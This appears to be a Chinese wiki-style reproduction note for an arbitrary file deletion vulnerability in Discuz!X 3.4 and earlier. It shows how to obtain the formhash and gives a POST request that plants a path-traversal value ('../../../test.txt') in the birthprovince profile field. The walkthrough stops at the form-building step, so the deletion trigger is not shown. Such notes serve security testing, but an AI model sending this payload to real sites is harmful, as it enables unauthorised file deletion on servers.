# Discuz!X ≤3.4 任意文件刪除漏洞
==獲得用戶Hash==
在個人資料頁面 -> 審查元素 -> 搜索formhash
[[檔案:Dz1.jpg |400px]]
==漏洞利用==
發送請求(XXXXXX表示Hash)
home.php?mod=spacecp&ac=profile&op=base POST birthprovince=../../../test.txt&profilesubmit=1&formhash=XXXXXX
*也可以使用Burp抓包,在birthprovince處加入../../../test.txt
修改成功之後出生地就會變為../../../test.txt
[[檔案:Dz2.jpg |400px]]
構造表單:
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容